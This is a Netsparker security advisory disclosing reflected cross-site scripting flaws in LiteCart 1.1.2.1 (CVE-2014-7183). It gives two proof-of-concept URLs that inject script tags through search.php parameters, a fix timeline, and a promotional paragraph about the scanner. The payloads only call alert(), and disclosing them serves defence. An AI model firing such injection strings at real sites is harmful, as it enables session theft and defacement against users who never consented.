LiteCart 1.1.2.1 Cross Site Scripting

`Information  
-----------  
Advisory by Netsparker.  
Name: Multiple XSS Vulnerabilities in LiteCart  
Affected Software : LiteCart  
Affected Versions: 1.1.2.1 and possibly below  
Vendor Homepage : http://www.litecart.net  
Vulnerability Type : Cross-site Scripting  
Severity : Important  
CVE-ID: CVE-2014-7183  
Netsparker Advisory Reference : NS-14-032  
  
Advisory URL  
------------  
https://www.netsparker.com/xss-vulnerabilities-in-litecart/  
  
Description  
--------------------  
Several cross-site scripting vulnerabilities where discovered in  
LiteCart, an open source project that allows you to create a  
e-commerce sites.  
  
Technical Details  
--------------------  
Proof of Concept URLs for XSS in LiteCart:  
  
http://example.com/litecart-1-1-2-1/search.php?query='"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>  
  
http://example.com/litecart-1-1-2-1/search.php?'"--></style></scRipt><scRipt>alert(0x0000B9)</scRipt>  
  
For more information on cross-site scripting vulnerabilities read the  
following article;  
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/.  
  
Advisory Timeline  
--------------------  
23/09/2014 - First Contact  
29/09/2014 - Vendor released fix  
  
Credits & Authors  
--------------------  
These issues have been discovered by Onur Yilmaz while testing  
Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
Netsparker can find and report security issues and vulnerabilities  
such as SQL Injection and Cross-site Scripting (XSS) in all websites  
and web applications regardless of the platform and the technology  
they are built on. Netsparker's unique detection and exploitation  
techniques allows it to be dead accurate in reporting hence it's the  
first and the only False Positive Free web application security  
scanner. For more information on Netsparker visit  
https://www.netsparker.com.  
`